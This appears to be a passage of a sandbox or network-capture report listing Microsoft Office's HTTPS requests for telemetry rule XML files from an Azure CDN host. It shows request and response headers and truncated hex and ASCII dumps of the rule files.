2024-10-30 02:55:52 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


Session IDSource IPSource PortDestination IPDestination Port
78192.168.2.55258613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:52 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:52 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:52 GMT
Content-Type: text/xml
Content-Length: 501
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
ETag: "0x8DC582BACFDAACD"
x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025552Z-16849878b78bcpfn2qf7sm6hsn000000090000000000h4wm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:52 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


Session IDSource IPSource PortDestination IPDestination Port
79192.168.2.55258713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:52 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:52 GMT
Content-Type: text/xml
Content-Length: 2592
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5B890DB"
x-ms-request-id: 88d45aac-e01e-003c-3e01-29c70b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025552Z-r197bdfb6b4skzzvqpzzd3xetg00000006vg000000008q71
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:52 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


Session IDSource IPSource PortDestination IPDestination Port
80192.168.2.55258813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 3342
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
ETag: "0x8DC582B927E47E9"
x-ms-request-id: fe72e82f-401e-008c-6e5e-2786c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-17c5cb586f6f8m6jnehy0z65x400000006mg00000000gvwd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:53 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


Session IDSource IPSource PortDestination IPDestination Port
81192.168.2.55258913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 2284
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
ETag: "0x8DC582BCD58BEEE"
x-ms-request-id: fb8efb24-701e-0050-0ba3-266767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-16849878b7828dsgct3vrzta7000000005vg00000000b629
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:53 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


Session IDSource IPSource PortDestination IPDestination Port
82192.168.2.55259013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
ETag: "0x8DC582BE3E55B6E"
x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-16849878b78zqkvcwgr6h55x9n00000006wg00000000a66r
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:53 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


Session IDSource IPSource PortDestination IPDestination Port
83192.168.2.55259113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDC681E17"
x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-16849878b78bcpfn2qf7sm6hsn00000009300000000066d3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:53 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
84192.168.2.55259213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:53 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
ETag: "0x8DC582BE39DFC9B"
x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-16849878b78qfbkc5yywmsbg0c000000071g00000000m1nm
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:53 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


Session IDSource IPSource PortDestination IPDestination Port
85192.168.2.55259313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:53 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:53 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF66E42D"
x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025553Z-16849878b78p8hrf1se7fucxk8000000087g00000000ma45
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
86192.168.2.55259513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
ETag: "0x8DC582BE6431446"
x-ms-request-id: 44be6224-701e-0032-738d-27a540000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-17c5cb586f6gkqkwd0x1ge8t04000000080g000000004at7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
87192.168.2.55259413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE017CAD3"
x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-16849878b78bcpfn2qf7sm6hsn000000090000000000h507
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


Session IDSource IPSource PortDestination IPDestination Port
88192.168.2.55259613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE12A98D"
x-ms-request-id: 8f4dae4f-901e-008f-19cb-2767a6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-17c5cb586f672xmrz843mf85fn00000006c00000000017x5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


